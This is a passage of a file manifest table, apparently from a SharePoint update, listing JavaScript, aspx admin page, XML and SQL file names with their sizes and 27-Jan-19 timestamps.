jsgrid.gantt.debug.js| | 109470| 27-Jan-19| 11:06 \njsgrid.gantt.js| jsgrid.gantt.js| | 41962| 27-Jan-19| 11:06 \njsgrid.gantt.xml| jsgrid.gantt.xml| | 84| 27-Jan-19| 11:07 \njsgrid.js| jsgrid.js| | 436852| 27-Jan-19| 11:06 \njsgrid.xml| jsgrid.xml| | 60| 27-Jan-19| 11:07 \nlanguagepickercontrol.js| languagepickercontrol.js| | 11175| 27-Jan-19| 11:06 \nmapviewtemplate.debug.js| mapviewtemplate.debug.js| | 37816| 27-Jan-19| 11:06 \nmapviewtemplate.js| mapviewtemplate.js| | 15210| 27-Jan-19| 11:06 \nmapvt.xml| mapviewtemplate.xml| | 106| 27-Jan-19| 11:07 \nmenu.debug.js| menu.debug.js| | 101574| 27-Jan-19| 11:06 \nmenu.htc| menu.htc| | 21872| 27-Jan-19| 11:06 \nmenu.js_0001| menu.js| | 51332| 27-Jan-19| 11:06 \nmenubar.htc| menubar.htc| | 13961| 27-Jan-19| 11:06 \nmquery.debug.js| mquery.debug.js| | 59856| 27-Jan-19| 11:06 \nmquery.js| mquery.js| | 22239| 27-Jan-19| 11:06 \nmquery.xml| mquery.xml| | 89| 27-Jan-19| 11:07 \noffline.debug.js| offline.debug.js| | 7585| 27-Jan-19| 11:06 \noffline.js| offline.js| | 3595| 27-Jan-19| 11:06 \nows.debug.js| ows.debug.js| | 510857| 27-Jan-19| 11:06 \nows.js| ows.js| | 265222| 27-Jan-19| 11:06 \nows.xml| ows.xml| | 85| 27-Jan-19| 11:07 \nowsbrows.debug.js| owsbrows.debug.js| | 9579| 27-Jan-19| 11:06 \nowsbrows.js| owsbrows.js| | 6113| 27-Jan-19| 11:06 \npickerhierarchycontrol.js| pickerhierarchycontrol.js| | 85910| 27-Jan-19| 11:06 \npivotcontrol.debug.js| pivotcontrol.debug.js| | 16089| 27-Jan-19| 11:06 \npivotcontrol.js| pivotcontrol.js| | 8700| 27-Jan-19| 11:06 \nquicklaunch.debug.js| quicklaunch.debug.js| | 130124| 27-Jan-19| 11:06 \nquicklaunch.js| quicklaunch.js| | 69543| 27-Jan-19| 11:06 \nquicklaunch.js.xml| quicklaunch.xml| | 120| 27-Jan-19| 11:07 \nradiobuttonwithchildren.js| radiobuttonwithchildren.js| | 3208| 27-Jan-19| 11:06 \nroamingapps.debug.js| roamingapps.debug.js| | 46291| 27-Jan-19| 11:06 \nroamingapps.js| roamingapps.js| | 19190| 27-Jan-19| 11:06 \nroamingapp.xml| roamingapps.xml| | 93| 27-Jan-19| 11:07 \nsharing.debug.js| sharing.debug.js| | 71639| 27-Jan-19| 11:06 \nsharing.js| sharing.js| | 27124| 27-Jan-19| 11:06 \nsharing.xml| sharing.xml| | 171| 27-Jan-19| 11:07 \nsiteupgrade.debug.js| siteupgrade.debug.js| | 1135| 27-Jan-19| 11:06 \nsiteupgrade.debug.js_14| siteupgrade.debug.js| | 1135| 27-Jan-19| 11:06 \nsiteupgrade.js| siteupgrade.js| | 808| 27-Jan-19| 11:06 \nsiteupgrade.js_14| siteupgrade.js| | 808| 27-Jan-19| 11:06 \nsp.core.debug.js| sp.core.debug.js| | 73924| 27-Jan-19| 11:06 \nsp.core.js| sp.core.js| | 40446| 27-Jan-19| 11:06 \nsp.core.xml| sp.core.xml| | 150| 27-Jan-19| 11:07 \nsp.datetimeutil.debug.js| sp.datetimeutil.debug.js| | 114154| 27-Jan-19| 11:06 \nsp.datetimeutil.debug.js.x64| sp.datetimeutil.debug.js| | 114154| 27-Jan-19| 11:06 \nsp.datetimeutil.js| sp.datetimeutil.js| | 67895| 27-Jan-19| 11:06 \nsp.datetimeutil.js.x64| sp.datetimeutil.js| | 67895| 27-Jan-19| 11:06 \nsp.datetimeutil.xml| sp.datetimeutil.xml| | 69| 27-Jan-19| 11:07 \nsp.debug.js| sp.debug.js| | 1003871| 27-Jan-19| 11:06 \nsp.debug.js.x64| sp.debug.js| | 1003871| 27-Jan-19| 11:06 \nsp.exp.debug.js| sp.exp.debug.js| | 40770| 27-Jan-19| 11:06 \nsp.exp.js| sp.exp.js| | 24528| 27-Jan-19| 11:06 \nsp.exp.xml| sp.exp.xml| | 48| 27-Jan-19| 11:07 \nsp.init.debug.js| sp.init.debug.js| | 55563| 27-Jan-19| 11:06 \nsp.init.js| sp.init.js| | 32205| 27-Jan-19| 11:06 \nsp.js| sp.js| | 626040| 27-Jan-19| 11:06 \nsp.js.x64| sp.js| | 626040| 27-Jan-19| 11:06 \nspmap.debug.js| sp.map.debug.js| | 15227| 27-Jan-19| 11:06 \nspmap.js| sp.map.js| | 8235| 27-Jan-19| 11:06 \nspmap.xml| sp.map.xml| | 65| 27-Jan-19| 11:07 \nsp.requestexecutor.debug.js| sp.requestexecutor.debug.js| | 81201| 27-Jan-19| 11:06 \nsp.requestexecutor.debug.js.x64| sp.requestexecutor.debug.js| | 81201| 27-Jan-19| 11:06 \nsp.requestexecutor.js| sp.requestexecutor.js| | 51540| 27-Jan-19| 11:06 \nsp.requestexecutor.js.x64| sp.requestexecutor.js| | 51540| 27-Jan-19| 11:06 \nsp.requestexecutor.xml| sp.requestexecutor.xml| | 46| 27-Jan-19| 11:07 \nsp.ribbon.debug.js| sp.ribbon.debug.js| | 363159| 27-Jan-19| 11:06 \nsp.ribbon.js| sp.ribbon.js| | 224039| 27-Jan-19| 11:06 \nsp.ribbon.xml| sp.ribbon.xml| | 321| 27-Jan-19| 11:07 \nsp.runtime.debug.js| sp.runtime.debug.js| | 185617| 27-Jan-19| 11:06 \nsp.runtime.debug.js.x64| sp.runtime.debug.js| | 185617| 27-Jan-19| 11:06 \nsp.runtime.js| sp.runtime.js| | 111493| 27-Jan-19| 11:06 \nsp.runtime.js.x64| sp.runtime.js| | 111493| 27-Jan-19| 11:06 \nsp.runtime.xml| sp.runtime.xml| | 46| 27-Jan-19| 11:07 \nsp.storefront.debug.js| sp.storefront.debug.js| | 422688| 27-Jan-19| 11:06 \nsp.storefront.js| sp.storefront.js| | 294435| 27-Jan-19| 11:06 \nsp.storefront.xml| sp.storefront.xml| | 346| 27-Jan-19| 11:07 \nsp.ui.admin.debug.js| sp.ui.admin.debug.js| | 18342| 27-Jan-19| 11:06 \nsp.ui.admin.js| sp.ui.admin.js| | 11378| 27-Jan-19| 11:06 \nsp.ui.allapps.debug.js| sp.ui.allapps.debug.js| | 42395| 27-Jan-19| 11:06 \nsp.ui.allapps.js| sp.ui.allapps.js| | 26257| 27-Jan-19| 11:06 \nsp.ui.applicationpages.calendar.debug.js| sp.ui.applicationpages.calendar.debug.js| | 277389| 27-Jan-19| 11:06 \nsp.ui.applicationpages.calendar.js| sp.ui.applicationpages.calendar.js| | 144873| 27-Jan-19| 11:06 \nsp.ui.applicationpages.calendar.xml| sp.ui.applicationpages.calendar.xml| | 225| 27-Jan-19| 11:07 \nsp.ui.applicationpages.debug.js| sp.ui.applicationpages.debug.js| | 10163| 27-Jan-19| 11:06 \nsp.ui.applicationpages.js| sp.ui.applicationpages.js| | 6953| 27-Jan-19| 11:06 \nsp.ui.applicationpages.xml| sp.ui.applicationpages.xml| | 213| 27-Jan-19| 11:07 \nsp.ui.bdcadminpages.debug.js| sp.ui.bdcadminpages.debug.js| | 16063| 27-Jan-19| 11:06 \nsp.ui.bdcadminpages.js| sp.ui.bdcadminpages.js| | 11315| 27-Jan-19| 11:06 \nspblogd.js| sp.ui.blogs.debug.js| | 50644| 27-Jan-19| 11:06 \nspblog.js| sp.ui.blogs.js| | 31017| 27-Jan-19| 11:06 \nsp.ui.blogs.xml| sp.ui.blogs.xml| | 94| 27-Jan-19| 11:07 \nsp.ui.combobox.debug.js| sp.ui.combobox.debug.js| | 99428| 27-Jan-19| 11:06 \nsp.ui.combobox.js| sp.ui.combobox.js| | 52107| 27-Jan-19| 11:06 \nsp.ui.combobox.xml| sp.ui.combobox.xml| | 54| 27-Jan-19| 11:07 \nsp.ui.controls.debug.js| sp.ui.controls.debug.js| | 55987| 27-Jan-19| 11:06 \nsp.ui.controls.js| sp.ui.controls.js| | 38359| 27-Jan-19| 11:06 \nsp.ui.dialog.debug.js| sp.ui.dialog.debug.js| | 69292| 27-Jan-19| 11:06 \nsp.ui.dialog.js| sp.ui.dialog.js| | 40375| 27-Jan-19| 11:06 \nsp.ui.dialog.xml| sp.ui.dialog.xml| | 90| 27-Jan-19| 11:07 \nspdiscd.js| sp.ui.discussions.debug.js| | 136506| 27-Jan-19| 11:06 \nspdisc.js| sp.ui.discussions.js| | 82216| 27-Jan-19| 11:06 \nsp.ui.discussions.xml| sp.ui.discussions.xml| | 94| 27-Jan-19| 11:07 \nspimgcd.js| sp.ui.imagecrop.debug.js| | 27973| 27-Jan-19| 11:06 \nspimgc.js| sp.ui.imagecrop.js| | 27973| 27-Jan-19| 11:06 \nspui_rid.js| sp.ui.relateditems.debug.js| | 27858| 27-Jan-19| 11:06 \nspui_ri.js| sp.ui.relateditems.js| | 17478| 27-Jan-19| 11:06 \nsp.ui.ri.xml| sp.ui.relateditems.xml| | 114| 27-Jan-19| 11:07 \nsp.ui.rte.debug.js| sp.ui.rte.debug.js| | 1011981| 27-Jan-19| 11:06 \nsp.ui.rte.js| sp.ui.rte.js| | 584358| 27-Jan-19| 11:06 \nsp.ui.rte.xml| sp.ui.rte.xml| | 74| 27-Jan-19| 11:07 \nsp.ui.tileview.debug.js| sp.ui.tileview.debug.js| | 65203| 27-Jan-19| 11:06 \nsp.ui.tileview.js| sp.ui.tileview.js| | 40240| 27-Jan-19| 11:06 \nsp.ui.tileview.xml| sp.ui.tileview.xml| | 129| 27-Jan-19| 11:07 \nspui_tld.js| sp.ui.timeline.debug.js| | 433941| 27-Jan-19| 11:06 \nspui_tl.js| sp.ui.timeline.js| | 239788| 27-Jan-19| 11:06 \nspstl.xml| sp.ui.timeline.xml| | 111| 27-Jan-19| 11:07 \nsp.xml| sp.xml| | 106| 27-Jan-19| 11:07 \nspgantt.debug.js| spgantt.debug.js| | 183484| 27-Jan-19| 11:06 \nspgantt.js| spgantt.js| | 66168| 27-Jan-19| 11:06 \nspgantt.xml| spgantt.xml| | 159| 27-Jan-19| 11:07 \nspgridview.debug.js| spgridview.debug.js| | 7321| 27-Jan-19| 11:06 \nspgridvw.js| spgridview.js| | 4593| 27-Jan-19| 11:06 \nspgridview.xml| spgridview.xml| | 92| 27-Jan-19| 11:07 \nstart.debug.js| start.debug.js| | 174744| 27-Jan-19| 11:06 \nstart.js| start.js| | 95780| 27-Jan-19| 11:06 \nstrings.xml| strings.xml| | 140| 27-Jan-19| 11:07 \nsuitelinks.debug.js| suitelinks.debug.js| | 32558| 27-Jan-19| 11:06 \nsuitelnk.js| suitelinks.js| | 13795| 27-Jan-19| 11:06 \nsuitelinks.xml| suitelinks.xml| | 134| 27-Jan-19| 11:07 \nsuitenav.js| suitenav.js| | 34319| 27-Jan-19| 11:06 \ntimecard.debug.js| timecard.debug.js| | 36906| 27-Jan-19| 11:06 \ntimecard.js| timecard.js| | 20888| 27-Jan-19| 11:06 \nwpadder.debug.js| wpadder.debug.js| | 49561| 27-Jan-19| 11:06 \nwpadder.js| wpadder.js| | 31016| 27-Jan-19| 11:06 \nwpcm.debug.js| wpcm.debug.js| | 6894| 27-Jan-19| 11:06 \nwpcm.js| wpcm.js| | 3509| 27-Jan-19| 11:06 \nmain.xsl| main.xsl| | 5653| 27-Jan-19| 11:07 \nallitems.asx_0086| allitems.aspx| | 2463| 27-Jan-19| 11:07 \ndispform.asx_0071| dispform.aspx| | 4190| 27-Jan-19| 11:07 \neditform.asx_0071| editform.aspx| | 4167| 27-Jan-19| 11:07 \nmyitems.asx_0008| myitems.aspx| | 2718| 27-Jan-19| 11:07 \nnewform.asx_0055| newform.aspx| | 4197| 27-Jan-19| 11:07 \nschema.xml_0012| schema.xml| | 253482| 27-Jan-19| 11:07 \nallitems.asx_0089| allitems.aspx| | 2463| 27-Jan-19| 11:07 \ndispform.asx_0083| dispform.aspx| | 4190| 27-Jan-19| 11:07 \neditform.asx_0083| editform.aspx| | 4167| 27-Jan-19| 11:07 \nmyitems.asx_0009| myitems.aspx| | 2718| 27-Jan-19| 11:07 \nnewform.asx_0062| newform.aspx| | 4197| 27-Jan-19| 11:07 \nschema.xml_0027| schema.xml| | 245825| 27-Jan-19| 11:07 \nmtgredir.asx_0001| mtgredir.aspx| | 1436| 27-Jan-19| 11:07 \nnewmws.asx| newmws.aspx| | 18858| 27-Jan-19| 11:07 \nmovetodt.asx| movetodt.aspx| | 3075| 27-Jan-19| 11:07 \nschema.xml_0079| schema.xml| | 79705| 27-Jan-19| 11:07 \nallitems.asx_0088| allitems.aspx| | 2463| 27-Jan-19| 11:07 \ndispform.asx_0082| dispform.aspx| | 4190| 27-Jan-19| 11:07 \neditform.asx_0082| editform.aspx| | 4167| 27-Jan-19| 11:07 \nnewform.asx_0061| newform.aspx| | 4197| 27-Jan-19| 11:07 \nschema.xml_0026| schema.xml| | 127795| 27-Jan-19| 11:07 \nallitems.asx_0087| allitems.aspx| | 2463| 27-Jan-19| 11:07 \ndispform.asx_0072| dispform.aspx| | 4190| 27-Jan-19| 11:07 \neditform.asx_0072| editform.aspx| | 4167| 27-Jan-19| 11:07 \nmanagea.asx| managea.aspx| | 2718| 27-Jan-19| 11:07 \nnewform.asx_0056| newform.aspx| | 5954| 27-Jan-19| 11:07 \nschema.xml_0021| schema.xml| | 255145| 27-Jan-19| 11:07 \ndefault.aspx_mps| default.aspx| | 4102| 27-Jan-19| 11:07 \nspstd1.asx_0004| spstd1.aspx| | 4134| 27-Jan-19| 11:07 \nallitems.asx_0032| allitems.aspx| | 2463| 27-Jan-19| 11:07 \ndispform.asx_0038| dispform.aspx| | 4190| 27-Jan-19| 11:07 \neditform.asx_0040| editform.aspx| | 4167| 27-Jan-19| 11:07 \nnewform.asx_0021| newform.aspx| | 4197| 27-Jan-19| 11:07 \nschema.xml_0039| schema.xml| | 42852| 27-Jan-19| 11:07 \nallitems.asx_0090| allitems.aspx| | 2463| 27-Jan-19| 11:07 \ndispform.asx_0084| dispform.aspx| | 4190| 27-Jan-19| 11:07 \neditform.asx_0084| editform.aspx| | 4167| 27-Jan-19| 11:07 \nmyitems.asx_0001| myitems.aspx| | 2718| 27-Jan-19| 11:07 \nnewform.asx_0063| newform.aspx| | 4197| 27-Jan-19| 11:07 \nschema.xml_0028| schema.xml| | 245557| 27-Jan-19| 11:07 \nschema.xml_0033| schema.xml| | 51432| 27-Jan-19| 11:07 \nonet.xml_mps| onet.xml| | 20985| 27-Jan-19| 11:07 \nnotif.clbk.typ.xml| notificationcallbacktypes.xml| | 1267| 27-Jan-19| 11:07 \nform.asp_pages_form| form.aspx| | 4065| 27-Jan-19| 11:07 \nview.asp_pages_viewpage| viewpage.aspx| | 2718| 27-Jan-19| 11:07 \nview.asp_pages_webfldr| webfldr.aspx| | 2521| 27-Jan-19| 11:07 \nresxscriptx.xsd| resxscriptx.xsd| | 1229| 27-Jan-19| 11:07 \nsvrfiles.xml| serverfiles.xml| | 213| 27-Jan-19| 11:07 \nshrulee.xsd| sitehealthruleregistrationerror.xsd| | 1909| 27-Jan-19| 11:07 \nshrulew.xsd| sitehealthruleregistrationwarning.xsd| | 1911| 27-Jan-19| 11:07 \nsitehcwss.xml| sitehealthwssrules.xml| | 1010| 27-Jan-19| 11:06 \nsitehcwss.xml_14| sitehealthwssrules.xml| | 1010| 27-Jan-19| 11:06 \nspkvp.xsd| spkeyvaluepairs.xsd| | 1727| 27-Jan-19| 11:07 \nspmtlprm.xsd| spmetalparameters.xsd| | 3857| 27-Jan-19| 11:07 \nappmng.sql| appmng.sql| | 289219| 27-Jan-19| 11:06 \nappmngup.sql| appmngup.sql| | 282966| 27-Jan-19| 11:06 \nbdc.sql| bdc.sql| | 558446| 27-Jan-19| 11:06 \nconfigdb.sql| configdb.sql| | 189484| 27-Jan-19| 11:06 \nconfigup.sql| configup.sql| | 48486| 27-Jan-19| 11:06 \ncfgupddl.sql| configupddl.sql| | 131| 27-Jan-19| 11:06 \nusgdiag.sql| diagnostics.sql| | 19977| 27-Jan-19| 11:06 \nsigcfg.cer| sigconfigdb.cer| | 689| 27-Jan-19| 11:06 \nsigcfg.dll| sigconfigdb.dll| | 8832| 27-Jan-19| 11:06 \nsigstore.cer| sigstore.cer| | 689| 27-Jan-19| 11:06 \nsigstore.dll| sigstore.dll| | 8816| 27-Jan-19| 11:06 \nstore.sql| store.sql| | 6504340| 27-Jan-19| 11:06 \nstoreup.sql| storeup.sql| | 512275| 27-Jan-19| 11:06 \nstoupddl.sql| storeupddl.sql| | 131| 27-Jan-19| 11:06 \nsubscr.sql| subscriptionsettings.sql| | 33788| 27-Jan-19| 11:06 \nusagedb.sql| usagedb.sql| | 81583| 27-Jan-19| 11:06 \nusgdbup.sql| usgdbup.sql| | 81392| 27-Jan-19| 11:06 \naddbact.asx| addbdcaction.aspx| | 13019| 27-Jan-19| 11:07 \naddbapp.asx| addbdcapplication.aspx| | 9266| 27-Jan-19| 11:07 \naddiurl.asx| addincomingurl.aspx| | 4473| 27-Jan-19| 11:07 \nadmin.smp| admin.sitemap| | 15577| 27-Jan-19| 11:07 \nadmcfgc.asx| adminconfigceip.aspx| | 7764| 27-Jan-19| 11:07 \nadmcfgi.asx| adminconfigintro.aspx| | 8689| 27-Jan-19| 11:07 \nadmcfgr.asx| adminconfigresults.aspx| | 5038| 27-Jan-19| 11:07 \nadmcfgs.asx| adminconfigservices.aspx| | 9937| 27-Jan-19| 11:07 \nadmcfgsr.asx| adminconfigservicesresults.aspx| | 4998| 27-Jan-19| 11:07 \nadminweb.cfg| adminweb.config| | 899| 27-Jan-19| 11:06 \nallappprincipals.asx| allappprincipals.aspx| | 6808| 27-Jan-19| 11:07 \nalturls.asx| alternateurlcollections.aspx| | 7122| 27-Jan-19| 11:07 \nappassoc.asx| applicationassociations.aspx| | 5259| 27-Jan-19| 11:07 \nappasdlg.asx| applicationassociationsdialog.aspx| | 3519| 27-Jan-19| 11:07 \nappcreat.asx| applicationcreated.aspx| | 4106| 27-Jan-19| 11:07 \nauthen.asx| authentication.aspx| | 13828| 27-Jan-19| 11:07 \nauthprov.asx| authenticationproviders.aspx| | 4939| 27-Jan-19| 11:07 \navadmin.asx| avadmin.aspx| | 9653| 27-Jan-19| 11:07 \nbackup.asx| backup.aspx| | 15389| 27-Jan-19| 11:07 \nbackhis.asx| backuphistory.aspx| | 20577| 27-Jan-19| 11:07 \nbackset.asx| backupsettings.aspx| | 8689| 27-Jan-19| 11:07 \nbackupst.asx| backupstatus.aspx| | 10643| 27-Jan-19| 11:07 \nbdcapps.asx| bdcapplications.aspx| | 14415| 27-Jan-19| 11:07 \nbdclobs.asx| bdclobsettings.aspx| | 7037| 27-Jan-19| 11:07 \nblkftyp.asx| blockedfiletype.aspx| | 4045| 27-Jan-19| 11:07 \ncaaapplm.asx| ca_allapplicensesmanagement.aspx| | 8267| 27-Jan-19| 11:07 \ncasapplm.asx| ca_specificapplicensemanagement.aspx| | 29344| 27-Jan-19| 11:07 \ncntdbadm.asx| cntdbadm.aspx| | 6042| 27-Jan-19| 11:07 \nconfgssc.asx| configssc.aspx| | 22074| 27-Jan-19| 11:07 \nconfgapp.asx| configureappsettings.aspx| | 7246| 27-Jan-19| 11:07 \ncreatecorpcatalog.asx| createcorporatecatalog.aspx| | 18174| 27-Jan-19| 11:07 \ncreatexu.asx| createexternalurl.aspx| | 4182| 27-Jan-19| 11:07 \ncreatsit.asx| createsite.aspx| | 17064| 27-Jan-19| 11:07 \ndbstats.asx| databasestatus.aspx| | 5023| 27-Jan-19| 11:07 \ndeacfadm.asx| deactivatefeature.aspx| | 3184| 27-Jan-19| 11:07 \ndftcntdb.asx| defaultcontentdb.aspx| | 6455| 27-Jan-19| 11:07 \ndelstcfg.asx| deletesiteconfig.aspx| | 12279| 27-Jan-19| 11:07 \ndelapp.asx| deletewebapplication.aspx| | 6619| 27-Jan-19| 11:07 \ndelsite.asx| delsite.aspx| | 7267| 27-Jan-19| 11:07 \ndplysoln.asx| deploysolution.aspx| | 10122| 27-Jan-19| 11:07 \ndmscmd.aspx| dmscmd.aspx| | 5593| 27-Jan-19| 11:07 \ndtcusta.asx| doctrancustomizeadmin.aspx| | 7789| 27-Jan-19| 11:07 \ndoctrana.asx| doctransadmin.aspx| | 7797| 27-Jan-19| 11:07 \ndspset.asx| dspsettings.aspx| | 14863| 27-Jan-19| 11:07 \neditacct.asx| editaccount.aspx| | 18305| 27-Jan-19| 11:07 \neditbact.asx| editbdcaction.aspx| | 12661| 27-Jan-19| 11:07 \neditiurl.asx| editincomingurl.aspx| | 4683| 27-Jan-19| 11:07 \neditourl.asx| editoutboundurls.aspx| | 7201| 27-Jan-19| 11:07 \nexpbapp.asx| exportbdcapplication.aspx| | 8043| 27-Jan-19| 11:07 \nextendvs.asx| extendvs.aspx| | 7113| 27-Jan-19| 11:07 \nextvsopt.asx| extendvsoption.aspx| | 5077| 27-Jan-19| 11:07 \nextwebfm.asx| extendwebfarm.aspx| | 5418| 27-Jan-19| 11:07 \nfarmjoin.asx| farmconfigjoinintro.aspx| | 8354| 27-Jan-19| 11:07 \nfarmcred.asx| farmcredentialmanagement.aspx| | 7541| 27-Jan-19| 11:07 \nfarmsvrs.asx| farmservers.aspx| | 4910| 27-Jan-19| 11:07 \ngemlcnfg.asx| globalemailconfig.aspx| | 8560| 27-Jan-19| 11:07 \ngmobcnfg.asx| globalxmsconfig.aspx| | 8407| 27-Jan-19| 11:07 \nhealrepo.asx| healthreport.aspx| | 6265| 27-Jan-19| 11:07 \nhtadmin.asx| htmltransadmin.aspx| | 10141| 27-Jan-19| 11:07 \nincemail.asx| incomingemail.aspx| | 22300| 27-Jan-19| 11:07 \nirmadmin.asx| irmadmin.aspx| | 8837| 27-Jan-19| 11:07 \njobedit.asx| jobedit.aspx| | 8303| 27-Jan-19| 11:07 \nlogusage.asx| logusage.aspx| | 14424| 27-Jan-19| 11:07 \nlropsta.asx| lroperationstatus.aspx| | 4915| 27-Jan-19| 11:07 \nmgbdcper.asx| managebdcpermissions.aspx| | 5485| 27-Jan-19| 11:07 \nmgbdcapp.asx| managebdcserviceapp.aspx| | 6684| 27-Jan-19| 11:07 \nmgappinf.asx| managebdcserviceappstateinfo.aspx| | 4613| 27-Jan-19| 11:07 \nmngcorpcatalog.asx| managecorporatecatalog.aspx| | 9289| 27-Jan-19| 11:07 \nmngaccts.asx| managedaccounts.aspx| | 5952| 27-Jan-19| 11:07 \nmngffeat.asx| managefarmfeatures.aspx| | 3273| 27-Jan-19| 11:07 \nmktplset.asx| managemarketplacesettings.aspx| | 7972| 27-Jan-19| 11:07 \nmngqtmpl.asx| managequotatemplate.aspx| | 18002| 27-Jan-19| 11:07 \nmngsftru.asx| manageservicefarmtrust.aspx| | 4743| 27-Jan-19| 11:07 \nmngtrust.asx| managetrust.aspx| | 6911| 27-Jan-19| 11:07 \nmngwfeat.asx| managewebappfeatures.aspx| | 4334| 27-Jan-19| 11:07 \nmetrics.asx| metrics.aspx| | 15273| 27-Jan-19| 11:07 \nadmin.mas| admin.master| | 29828| 27-Jan-19| 11:07 \nappascvw.asc| applicationassociationsview.ascx| | 4379| 27-Jan-19| 11:07 \napppool.asc| applicationpoolsection.ascx| | 8668| 27-Jan-19| 11:07 \nbsqmopt.asc| browserceipsection.ascx| | 2776| 27-Jan-19| 11:07 \ncerstsec.asc| certificatesettingsection.ascx| | 10758| 27-Jan-19| 11:07 \ncntdbsec.asc| contentdatabasesection.ascx| | 7964| 27-Jan-19| 11:07 \nidprosec.asc| identityprovidersettingsection.ascx| | 16007| 27-Jan-19| 11:07 \niiswsapp.asc| iiswebserviceapplicationpoolsection.ascx| | 8772| 27-Jan-19| 11:07 \niiswbste.asc| iiswebsitesection.ascx| | 14964| 27-Jan-19| 11:07 \npopup.mas| popup.master| | 3088| 27-Jan-19| 11:07 \nproxysel.asx| proxyselectionsection.ascx| | 5393| 27-Jan-19| 11:07 \nregacctl.asc| registeraccountcontrol.ascx| | 10073| 27-Jan-19| 11:07 \nrunjobs.asc| runningtimerjobs.ascx| | 4696| 27-Jan-19| 11:07 \nschedjob.asc| scheduledtimerjobs.ascx| | 3583| 27-Jan-19| 11:07 \ntjobhist.asc| timerjobhistory.ascx| | 5114| 27-Jan-19| 11:07 \ntopology.asc| topologyview.ascx| | 4091| 27-Jan-19| 11:07 \ntstgesec.asc| trustgeneralsettingsection.ascx| | 3656| 27-Jan-19| 11:07 \nnewappmngsvcapp.asx| newappmngserviceapp.aspx| | 6664| 27-Jan-19| 11:07 \nnewcntdb.asx| newcntdb.aspx| | 7208| 27-Jan-19| 11:07 \nofadmin.asx| officialfileadmin.aspx| | 13569| 27-Jan-19| 11:07 \noldcntdb.asx| oldcntdb.aspx| | 13658| 27-Jan-19| 11:07 \nowners.asx| owners.aspx| | 5602| 27-Jan-19| 11:07 \npwdset.asx| passwordsettings.aspx| | 8443| 27-Jan-19| 11:07 \npatchstt.asx| patchstatus.aspx| | 7284| 27-Jan-19| 11:07 \npolc.asx| policy.aspx| | 14387| 27-Jan-19| 11:07 \npolcanon.asx| policyanon.aspx| | 7109| 27-Jan-19| 11:07 \npolcrl.asx| policyrole.aspx| | 116092| 27-Jan-19| 11:07 \npolcrle.asx| policyroleedit.aspx| | 116100| 27-Jan-19| 11:07 \npolcrls.asx| policyroles.aspx| | 10688| 27-Jan-19| 11:07 \npolcusr.asx| policyuser.aspx| | 10142| 27-Jan-19| 11:07 \npolcusre.asx| policyuseredit.aspx| | 12411| 27-Jan-19| 11:07 \nprivacy.asx| privacy.aspx| | 8269| 27-Jan-19| 11:07 \nregacct.asx| registeraccount.aspx| | 4058| 27-Jan-19| 11:07 \nremacct.asx| removeaccount.aspx| | 8676| 27-Jan-19| 11:07 \nreqfeata.asx| reqfeatures.aspx| | 2625| 27-Jan-19| 11:07 \nrestore.asx| restore.aspx| | 16105| 27-Jan-19| 11:07 \nrestore3.asx| restorestep3.aspx| | 22878| 27-Jan-19| 11:07 \nrtctsoln.asx| retractsolution.aspx| | 7381| 27-Jan-19| 11:07 \nschedjob.asx| scheduledtimerjobs.aspx| | 7063| 27-Jan-19| 11:07 \nscprefix.asx_0001| scprefix.aspx| | 11391| 27-Jan-19| 11:07 \nslctauc.asx| selectalternateurlcollection.aspx| | 5141| 27-Jan-19| 11:07 \nslctapp.asx| selectapplication.aspx| | 6801| 27-Jan-19| 11:07 \nslctcfaz.asx| selectcrossfirewallaccesszone.aspx| | 5398| 27-Jan-19| 11:07 \nslctjob.asx| selectjobdefinition.aspx| | 5358| 27-Jan-19| 11:07 \nslctlist.asx| selectlist.aspx| | 8606| 27-Jan-19| 11:07 \nslctserv.asx| selectserver.aspx| | 4908| 27-Jan-19| 11:07 \nslctsvc.asx| selectservice.aspx| | 4982| 27-Jan-19| 11:07 \nslctsite.asx| selectsite.aspx| | 9385| 27-Jan-19| 11:07 \nslctweb.asx| selectweb.aspx| | 8459| 27-Jan-19| 11:07 \nslctwapp.asx| selectwebapplication.aspx| | 5356| 27-Jan-19| 11:07 \nserver.asx| server.aspx| | 9131| 27-Jan-19| 11:07 \nsvcappcn.asx| serviceapplicationconnect.aspx| | 4890| 27-Jan-19| 11:07 \nsvcappcd.asx| serviceapplicationconnectiondetails.aspx| | 4334| 27-Jan-19| 11:07 \nsvcappcp.asx| serviceapplicationconnectpopup.aspx| | 2991| 27-Jan-19| 11:07 \nsvcappdl.asx| serviceapplicationdelete.aspx| | 4443| 27-Jan-19| 11:07 \nsvcapppe.asx| serviceapplicationpermissions.aspx| | 4034| 27-Jan-19| 11:07 \nsvcapppb.asx| serviceapplicationpublish.aspx| | 10169| 27-Jan-19| 11:07 \nsvcapp.asx| serviceapplications.aspx| | 4101| 27-Jan-19| 11:07 \nsvcjdefs.asx| servicejobdefinitions.aspx| | 8692| 27-Jan-19| 11:07 \nsvcrjobs.asx| servicerunningjobs.aspx| | 7059| 27-Jan-19| 11:07 \nspdadmin.asx| sharepointdesigneradmin.aspx| | 6974| 27-Jan-19| 11:07 \nsiteex.asx| siteandlistexport.aspx| | 12299| 27-Jan-19| 11:07 \nsitebaks.asx| sitebackuporexportstatus.aspx| | 10242| 27-Jan-19| 11:07 \nsitecbac.asx| sitecollectionbackup.aspx| | 10522| 27-Jan-19| 11:07 \nsitecoll.asx| sitecollections.aspx| | 9189| 27-Jan-19| 11:07 \nsitcrted.asx| sitecreated.aspx| | 3632| 27-Jan-19| 11:07 \nsitequot.asx| sitequota.aspx| | 24323| 27-Jan-19| 11:07 \nsolns.asx| solutions.aspx| | 4786| 27-Jan-19| 11:07 \nsolnsts.asx| solutionstatus.aspx| | 10835| 27-Jan-19| 11:07 \nsolvmgr.asx| solutionvalidatormanager.aspx| | 10912| 27-Jan-19| 11:07 \nspadmin.rsx| spadmin.resx| | 359721| 27-Jan-19| 11:07 \nspscrstg.asx_0002| spsecuritysettings.aspx| | 7491| 27-Jan-19| 11:07 \nstbackup.asx| startbackup.aspx| | 14510| 27-Jan-19| 11:07 \nsuccessp.asx| successpopup.aspx| | 3735| 27-Jan-19| 11:07 \ntimer.asx| timer.aspx| | 8984| 27-Jan-19| 11:07 \ntjobhist.asx| timerjobhistory.aspx| | 8860| 27-Jan-19| 11:07 \nunatcdbb.asx| unattacheddbbrowse.aspx| | 6276| 27-Jan-19| 11:07 \nunatcdb.asx| unattacheddbselect.aspx| | 6082| 27-Jan-19| 11:07 \nunxtndvs.asx| unextendvs.aspx| | 5541| 27-Jan-19| 11:07 \nupgrstat.asx| upgradestatus.aspx| | 11239| 27-Jan-19| 11:07 \nuser_solution.asx| usersolutions.aspx| | 9435| 27-Jan-19| 11:07 